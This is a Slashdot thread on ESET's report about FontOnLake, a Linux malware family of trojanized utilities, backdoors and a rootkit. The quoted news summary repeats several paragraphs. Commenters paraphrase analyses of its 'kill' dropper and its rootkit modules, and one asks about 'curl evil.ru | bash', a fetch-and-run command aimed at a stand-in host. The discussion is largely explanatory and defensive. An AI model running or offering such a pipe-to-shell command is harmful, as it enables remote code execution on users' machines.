New 'FontOnLake' Malware Family Can Target Linux Systems (securityweek.com) 26
Security Week reports:
A previously unknown, modular malware family that targets Linux systems has been used in targeted attacks to collect credentials and gain access to victim systems, ESET reported on Thursday. Dubbed FontOnLake, the malware family employs a rootkit to conceal its presence and uses different command and control servers for each sample, which shows how careful its operators are to maintain a low profile.
What's more, the malware developers are constantly modifying the FontOnLake modules, and use three categories of components that have been designed to work together, namely trojanized applications, backdoors, and rootkits.
Evidence suggests that FontOnLake has been used in attacks aimed at organizations in Southeast Asia. The first malware samples related to this family emerged last May. The malware was previously described by Avast and Lacework as the HCRootkit / Sutersu Linux rootkit, as well as by Tencent Security Response Center in a February report.
The various trojanized applications that ESET's researchers have identified during their investigation are used to load custom backdoor or rootkit modules, but also to collect sensitive data when needed. Posing as standard Linux utilities, these files were also designed to achieve persistence on the compromised systems. What the researchers haven't figured out yet is the manner in which the trojanized applications are delivered to the victims. ESET's analysis of FontOnLake has revealed the use of three different backdoors, all written in C++, all using the same Asio library from Boost, and all capable of exfiltrating sshd credentials and bash command history.
The simplest of the three was designed to launch and mediate access to a local SSH server, update itself, and transmit collected credentials. The malware appears to be under development.
The second backdoor was also capable of file manipulation, updating itself, and uploading and downloading files, according to the article, while the third backdoor "accepts remote connections, serves as a proxy and can download and run Python scripts, in addition to exfiltrating credentials."
What's more, the malware developers are constantly modifying the FontOnLake modules, and use three categories of components that have been designed to work together, namely trojanized applications, backdoors, and rootkits.
Evidence suggests that FontOnLake has been used in attacks aimed at organizations in Southeast Asia. The first malware samples related to this family emerged last May. The malware was previously described by Avast and Lacework as the HCRootkit / Sutersu Linux rootkit, as well as by Tencent Security Response Center in a February report.
The various trojanized applications that ESET's researchers have identified during their investigation are used to load custom backdoor or rootkit modules, but also to collect sensitive data when needed. Posing as standard Linux utilities, these files were also designed to achieve persistence on the compromised systems. What the researchers haven't figured out yet is the manner in which the trojanized applications are delivered to the victims. ESET's analysis of FontOnLake has revealed the use of three different backdoors, all written in C++, all using the same Asio library from Boost, and all capable of exfiltrating sshd credentials and bash command history.
The simplest of the three was designed to launch and mediate access to a local SSH server, update itself, and transmit collected credentials. The malware appears to be under development.
The second backdoor was also capable of file manipulation, updating itself, and uploading and downloading files, according to the article, while the third backdoor "accepts remote connections, serves as a proxy and can download and run Python scripts, in addition to exfiltrating credentials."
It's a sign (Score:4, Funny)
It's a sign that Linux is in fact gaining some foothold on the desktop if malware authors are actually taking the time to write Linux malware.
It's not the sign I'd like, but it's an unmistakable sign nonetheless.
Maybe someday, god willing, we Linux users will have the same rich, full-featured malware that Windows users have available to them.
Re: (Score:3)
Maybe someday, god willing, we Linux users will have the same rich, full-featured malware that Windows users have available to them.
Yes, god can be a dick like that.
Re: (Score:2)
It's not the first, and it's not the first time that Linux has been shown to not be invulnerable to malware; unlike what knobs like to chirp on about.
Re: (Score:3)
...Linux has been shown to not be invulnerable to malware....
Writing malware for Linux has never been particularly hard. Getting it to automatically spread, though, is damned hard. Social engineering is, by far, the easiest route to spread Linux malware, as human security is much more lax than Linux's security.
Re: (Score:2)
From TFA ... (Score:4, Informative)
Posing as standard Linux utilities
Name them.
What the researchers haven't figured out yet is the manner in which the trojanized applications are delivered to the victims.
If the utilities in question were named, a smart person would have some idea as to how these came to be present on the targeted systems.
I suspect that the compromised utilities are something that is typically run with root permissions. Possibly at startup. And are big enough hairballs of code to discourage examination by all but the bravest of souls. But since these utilities are among Those That Shall Not Be Named, we will all must wait patiently for some wizard to clean the mess up for us.
These announcements of malware are frustrating (Score:5, Insightful)
All the articels one reads conflate four distinctl;y different things.
1. An theoreatical OS vuleranility exists.
2. There is a way to exploit this to achieve security hole X (e.g. harvesting SSH credentials)
3. There exists a tool chain that actualizes this
4. THere exists a mode or channel that can get this executable run on a computer.
When the latter is "remote exploit" it's interesting. When the letter is "User installs some malware themselves with user-land credatials" it's Yawn. It gets incrementally more exciting when the malware manages a hat trick of getting more priveldges or pesistence than you'd have thought possible due to some system level bug.
Re:From TFA ... (Score:4, Insightful)
Re: (Score:3)
Take that Python! (Score:3)
FontOnLake has revealed the use of three different backdoors, all written in C++ ...
C++ is currently 4th, but may be moving up on the TIOBE index [tiobe.com] ... :-)
How does it get installed? (Score:4, Informative)
Re: (Score:2)
Useless Slashcrap as usual. (Score:2)
Naming the utilities affected would be a nice start....
Re: (Score:3)
Re: (Score:2)
Actual details. (Score:5, Informative)
If you follow the links in the PDF the article links then you get to a few different sites.
Tencent has a write up in Chinese: https://security.tencent.com/i... [tencent.com]
I rewrote the machine translation a bit:
Mode of Infection
It appears the attacker first obtains access to a vulnerable server and then jumps to others by pushing the ELF dropper (kill) using scp to machines accessible through the compromised server, infiltrates, and repeats the process.
Note: A dropper is a kind of Trojan that has been designed to "install" some sort of malware (virus, backdoor, etc.) to a target system. The malware code is contained within the dropper (single-stage) and (in this case) is compressed using UPX to evade detection by virus scanners.
Lacework has a good overview: https://www.lacework.com/blog/... [lacework.com]
Important snippets:
The ELF dropper is a modified version of the coreutils “kill” binary. The majority of the “kill” binary’s core functionality remains the same, but with the addition of writing two ELF files to disk during execution. One of these components is a userland binary and the other a kernel module identified by Avast as the Sutersu rookit. Notably, figure – 0 and figure 1 show the the ELF dropper and kernel rootkit had low or non-existent detection rates on VirusTotal.
Given the underlying backdoor coreutils utility is kill, it is not uncommon for the legitimate usage of this utility to be executed via “sudo kill” when terminating privileged processes. Executing with sudo results in appropriate permissions to both install the kernel module and write to the privileged location in /proc/.
The kernel module as pointed out by Avast is the open-source rootkit “Sutersu” [github.com]. This rootkit has wide kernel version support, as well as supporting multiple architectures including x86, x86_64, and ARM. Sutersu supports file, port, and process hiding, as one would expect from a rootkit. Sutersu also supports functionality beyond process and file hiding in the form of additional modules that are specified during compile time.
At the time of this writing, these additional modules include a keylogger, a module to download and execute (DLEXEC) a binary upon a given event, and an ICMP module to monitor for specific “magic bytes” before triggering an event. The DLEXC and ICMP module can be used together to trigger the downloading and execution of a binary when a specific ICMP packet is received. They also can be used independently. Lacework labs identified multiple Sutersu kernel modules with various modules and external IPs.
Re: (Score:2)
Thank you. How does this malicious kill replace the system kill in the first place? Is it installed in the user's PATH? System file?
Specifically, are Linux machines at risk of `yum update` or at risk of `curl evil.ru | bash`?
Re: (Score:2)
Thank you. How does this malicious kill replace the system kill in the first place? Is it installed in the user's PATH? System file?
It's pushed via scp using stolen creds (keylogger and/or auth keys) from the current server. No idea where it pushes itself but it would make sense that it pushes to a user directory since if it could push it to the system level then it wouldn't even need to bother waiting for someone to use it.
Re: (Score:2)
Installing a compromised /usr/bin/kill is just the sort of thing integrity checking programs like Tripwire and others (AIDE, OSSEC) were designed to defeat. And you can generate a list of known hashes from the signed package meta data in most distros, or generate new ones automatically when installing. Of course the original hole is a problem, but making intrusion easier to detect and harder to exploit is desirable. Tripwire is 20 year old technology, there are far better alternatives but it's straight forw
A bit more info (Score:1)
How to catch Linux malware (Score:3)
b. Download some unknown software.
c. Run said software as root.
Anti Linux BS from the Microsoft slashdot (Score:1)